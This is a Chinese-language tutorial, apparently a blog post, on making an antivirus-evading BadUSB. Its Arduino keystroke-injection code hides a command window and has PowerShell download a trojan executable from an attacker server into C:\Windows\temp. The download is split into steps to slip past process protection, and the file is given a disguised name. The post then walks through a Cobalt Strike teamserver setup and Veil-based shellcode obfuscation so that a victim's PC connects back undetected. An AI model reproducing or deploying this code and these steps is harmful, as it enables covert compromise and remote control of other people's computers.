'BadUSB免杀'

Usb 板子和软件等准备工作： 见"BadUSB制作"

板子代码(经过测试可过 360 的沙雕变形虫防护，实际上火绒和电脑管家也过了)

void setup() {
Keyboard.begin();//开始键盘通讯
delay(300);//延时
Keyboard.press(KEY_LEFT_GUI);//win 键
delay(500);
Keyboard.press('r');//r 键
delay(500); 
Keyboard.release(KEY_LEFT_GUI); 
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");	//使用最小化隐藏cmd 窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN 
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(200); 
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object system.net.webclient;"); 
Keyboard.println("$url='http://47.240.xxx.xxx/susu.exe';");	//xxx 为你服务器 ip，susu 为生成的木马文件(可以把名字命名成什么 360update 之类的)
Keyboard.println("$file = 'c:\\windows\\temp\\susu.exe';");	//下载到目标存放文件的地址
Keyboard.println("$clnt.downloadfile($url,$file);");	//用分段执行绕过进程防护Keyboard.println("c:\\windows\\temp\\hy.exe");	//这里可以自行研究隐藏文件放到D盘，因为C盘可能没权限。思路：可使用attrib +h 1.txt 将文件隐藏
Keyboard.println("exit");//退出当前窗口
delay(3000);
Keyboard.println("exit"); 
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK); 
Keyboard.end();//结束键盘通讯
}

void loop() {
// put your main code here, to run repeatedly:
 

}

CS服务器部署
sudo apt-get install openjdk-8-jdk 先安装 java 环境
将CS复制到VPS启动CS服务器
./teamserver IP password

使用kali的工具veil生成免杀马
进去veil启动./veil.py
使用模式1免杀
使用go语言加密模块，也就是use 17

选择3自定义shellcode代码
最后在这里把CS生成的payload代码复制进去


最后进行命名，底下为木马存放位置
火绒查杀一下

将木马放到服务器上，将文件名重命名为全大写，因为板子的代码问题(必须修改)

服务器自行部署，检测是否可以下载文件

受害者电脑插入badusb（朋友的电脑是360的杀软，没有报毒）

运行成功后，主机自动上线CS